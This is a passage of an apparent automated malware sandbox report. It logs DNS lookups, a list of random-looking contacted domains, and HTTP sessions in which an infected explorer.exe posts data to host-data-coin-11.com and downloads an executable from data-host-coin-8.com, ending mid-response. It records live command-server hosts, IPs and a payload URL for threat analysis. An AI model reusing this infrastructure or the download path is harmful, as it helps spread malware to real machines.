                                                                                                                                                                                                    Jan 14, 2022 04:59:04.289714098 CET8.8.8.8192.168.2.30x7652No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.458097935 CET8.8.8.8192.168.2.30x93e2No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.100713968 CET8.8.8.8192.168.2.30x3dc9No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.676515102 CET8.8.8.8192.168.2.30x4db7No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.857112885 CET8.8.8.8192.168.2.30x9fe1No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.924907923 CET8.8.8.8192.168.2.30x5e60No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.419181108 CET8.8.8.8192.168.2.30x19efNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.605556011 CET8.8.8.8192.168.2.30x9734No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.777210951 CET8.8.8.8192.168.2.30x4516No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:07.219146013 CET8.8.8.8192.168.2.30x6f90No error (0)data-host-coin-8.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.436482906 CET8.8.8.8192.168.2.30x1054No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.602279902 CET8.8.8.8192.168.2.30xfd6dNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.827039957 CET8.8.8.8192.168.2.30x2b7fNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.997534037 CET8.8.8.8192.168.2.30xa8c6No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.155534029 CET8.8.8.8192.168.2.30xe5e9No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.328099966 CET8.8.8.8192.168.2.30xa452No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.499604940 CET8.8.8.8192.168.2.30xb6cfNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.696434975 CET8.8.8.8192.168.2.30xe8b0No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.696434975 CET8.8.8.8192.168.2.30xe8b0No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.696434975 CET8.8.8.8192.168.2.30xe8b0No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.696434975 CET8.8.8.8192.168.2.30xe8b0No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.696434975 CET8.8.8.8192.168.2.30xe8b0No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:15.869771957 CET8.8.8.8192.168.2.30x57eeNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.038958073 CET8.8.8.8192.168.2.30x2449No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.211462021 CET8.8.8.8192.168.2.30x90d1No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.419707060 CET8.8.8.8192.168.2.30x31e3No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.588934898 CET8.8.8.8192.168.2.30x5d04No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.763266087 CET8.8.8.8192.168.2.30xa153No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.928505898 CET8.8.8.8192.168.2.30x3a0dNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.136437893 CET8.8.8.8192.168.2.30x2ad0No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.649342060 CET8.8.8.8192.168.2.30x4cfcNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.845807076 CET8.8.8.8192.168.2.30xbd9cNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.032780886 CET8.8.8.8192.168.2.30x6eb0No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.241664886 CET8.8.8.8192.168.2.30x8dbcNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.427237034 CET8.8.8.8192.168.2.30x5518No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.598696947 CET8.8.8.8192.168.2.30x6941No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.795768023 CET8.8.8.8192.168.2.30x7b12No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.992176056 CET8.8.8.8192.168.2.30xbaa6No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:40.159840107 CET8.8.8.8192.168.2.30xeab0No error (0)data-host-coin-8.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.781734943 CET8.8.8.8192.168.2.30x2fb9No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.948843002 CET8.8.8.8192.168.2.30x31c7No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.118859053 CET8.8.8.8192.168.2.30x2946No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.118859053 CET8.8.8.8192.168.2.30x2946No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.638514042 CET8.8.8.8192.168.2.30x5a61No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.807667017 CET8.8.8.8192.168.2.30x7801No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.027211905 CET8.8.8.8192.168.2.30x4677No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.204377890 CET8.8.8.8192.168.2.30x588cNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.525659084 CET8.8.8.8192.168.2.30x1aefNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.737229109 CET8.8.8.8192.168.2.30xad97No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:44.219611883 CET8.8.8.8192.168.2.30x2957No error (0)data-host-coin-8.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.291184902 CET8.8.8.8192.168.2.30xd604No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.490119934 CET8.8.8.8192.168.2.30x3e52No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.702827930 CET8.8.8.8192.168.2.30xe48bNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.036506891 CET8.8.8.8192.168.2.30xd2dfNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.227461100 CET8.8.8.8192.168.2.30xf415No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.410892963 CET8.8.8.8192.168.2.30xa9e5No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.517072916 CET8.8.8.8192.168.2.30x7758No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.702513933 CET8.8.8.8192.168.2.30x8e87No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.894743919 CET8.8.8.8192.168.2.30x2accNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:51.061510086 CET8.8.8.8192.168.2.30xdd66No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:51.239556074 CET8.8.8.8192.168.2.30x307eNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.210815907 CET8.8.8.8192.168.2.30x3fcdNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.374965906 CET8.8.8.8192.168.2.30x3a36No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.852350950 CET8.8.8.8192.168.2.30x81dNo error (0)data-host-coin-8.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:56.692734957 CET8.8.8.8192.168.2.30x762bNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:56.868699074 CET8.8.8.8192.168.2.30xe43cNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:57.069597006 CET8.8.8.8192.168.2.30x5ec5No error (0)data-host-coin-8.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:58.570993900 CET8.8.8.8192.168.2.30x3149No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:58.765391111 CET8.8.8.8192.168.2.30x5336No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.245784998 CET8.8.8.8192.168.2.30x8753No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.480294943 CET8.8.8.8192.168.2.30x71e1No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.659004927 CET8.8.8.8192.168.2.30xad75No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.880700111 CET8.8.8.8192.168.2.30x7f0fNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:00.046947002 CET8.8.8.8192.168.2.30x7d46No error (0)data-host-coin-8.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:04.069551945 CET8.8.8.8192.168.2.30xca23No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:12.806410074 CET8.8.8.8192.168.2.30xc7e2No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:12.806410074 CET8.8.8.8192.168.2.30xc7e2No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:12.806410074 CET8.8.8.8192.168.2.30xc7e2No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:12.806410074 CET8.8.8.8192.168.2.30xc7e2No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:12.806410074 CET8.8.8.8192.168.2.30xc7e2No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • 185.233.81.115
                                                                                                                                                                                                    • cdn.discordapp.com
                                                                                                                                                                                                    • goo.su
                                                                                                                                                                                                    • transfer.sh
                                                                                                                                                                                                    • qlxnfuhj.net
                                                                                                                                                                                                      • host-data-coin-11.com
                                                                                                                                                                                                    • fggjhikg.com
                                                                                                                                                                                                    • slshljche.com
                                                                                                                                                                                                    • fqtuljhoii.net
                                                                                                                                                                                                    • rmdwdmn.org
                                                                                                                                                                                                    • hmirsmb.com
                                                                                                                                                                                                    • njsnp.org
                                                                                                                                                                                                    • rksnlek.org
                                                                                                                                                                                                    • data-host-coin-8.com
                                                                                                                                                                                                    • hxaovqrpb.com
                                                                                                                                                                                                    • afnhk.org
                                                                                                                                                                                                    • uyqwcjxbf.org
                                                                                                                                                                                                    • bncatspln.net
                                                                                                                                                                                                    • bwonexybi.com
                                                                                                                                                                                                    • unicupload.top
                                                                                                                                                                                                    • sworutss.com
                                                                                                                                                                                                    • drlfnir.com
                                                                                                                                                                                                    • rvqyadtl.com
                                                                                                                                                                                                    • irhpoqhlc.net
                                                                                                                                                                                                    • xpbxi.net
                                                                                                                                                                                                    • wefker.org
                                                                                                                                                                                                    • kyelhwx.com
                                                                                                                                                                                                    • gbuig.org
                                                                                                                                                                                                    • 185.7.214.171:8080
                                                                                                                                                                                                    • jjjeal.org
                                                                                                                                                                                                    • kllxbylc.org
                                                                                                                                                                                                    • iqiollry.net
                                                                                                                                                                                                    • lxvicbnfu.com
                                                                                                                                                                                                    • alysw.org
                                                                                                                                                                                                    • yocfbwydo.net
                                                                                                                                                                                                    • gempx.org
                                                                                                                                                                                                    • cnwtvll.org
                                                                                                                                                                                                    • ecigcmyd.org
                                                                                                                                                                                                    • qaicqimmrp.org
                                                                                                                                                                                                    • lwrsn.com
                                                                                                                                                                                                    • lqdvrak.com
                                                                                                                                                                                                    • scugxyrh.org
                                                                                                                                                                                                    • lwwgdj.net
                                                                                                                                                                                                    • umttqygm.net
                                                                                                                                                                                                    • dujdgqdl.org
                                                                                                                                                                                                    • acontkk.net
                                                                                                                                                                                                    • rwkvcn.org
                                                                                                                                                                                                    • urrhyr.com
                                                                                                                                                                                                    • bqqdf.org
                                                                                                                                                                                                    • dcbwcxee.net
                                                                                                                                                                                                    • vwrxdxe.org
                                                                                                                                                                                                    • kijlaf.com
                                                                                                                                                                                                    • xbgcbdcvsv.org
                                                                                                                                                                                                    • kvaxa.org
                                                                                                                                                                                                    • wferj.org
                                                                                                                                                                                                    • jkhktrj.net
                                                                                                                                                                                                    • uiswqsy.com
                                                                                                                                                                                                    • a0621298.xsph.ru
                                                                                                                                                                                                    • otiidv.com
                                                                                                                                                                                                    • adiacegte.com
                                                                                                                                                                                                    • kxdhsiskb.org
                                                                                                                                                                                                    • wuqrydcob.net
                                                                                                                                                                                                    • khptceilp.net
                                                                                                                                                                                                    • teeekh.org
                                                                                                                                                                                                    • rhggaprrm.com
                                                                                                                                                                                                    • rrvxdibqv.org
                                                                                                                                                                                                    • hcsfipgmy.com
                                                                                                                                                                                                    • ygjqjael.org
                                                                                                                                                                                                    • ijclu.net
                                                                                                                                                                                                    • abuneept.org
                                                                                                                                                                                                    • klaqrtvjum.org
                                                                                                                                                                                                    • veccr.org
                                                                                                                                                                                                    • egxhxygmwb.com
                                                                                                                                                                                                    • qcruxq.net
                                                                                                                                                                                                    • jurgfiow.org

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    0192.168.2.349760185.233.81.115443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    1192.168.2.349804162.159.133.233443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    10192.168.2.34975194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.866328955 CET1118OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://rmdwdmn.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 242
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.949268103 CET1119INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:58:59 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    11192.168.2.34975294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.354100943 CET1120OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://hmirsmb.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 154
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.435992002 CET1121INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:00 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2dI:82OI:J_J-WS,/0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    12192.168.2.34975494.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.734334946 CET1122OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://njsnp.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 310
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.814809084 CET1123INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:01 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    13192.168.2.34975594.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.901595116 CET1124OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://rksnlek.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 218
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.991240025 CET1124INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:01 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    14192.168.2.34975694.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.346384048 CET1125OUTGET /files/9030_1641816409_7037.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: data-host-coin-8.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410214901 CET1126INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:02 GMT
                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                    Content-Length: 301056
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Last-Modified: Mon, 10 Jan 2022 12:06:49 GMT
                                                                                                                                                                                                    ETag: "49800-5d5392be00934"
                                                                                                                                                                                                    Accept-Ranges: bytes
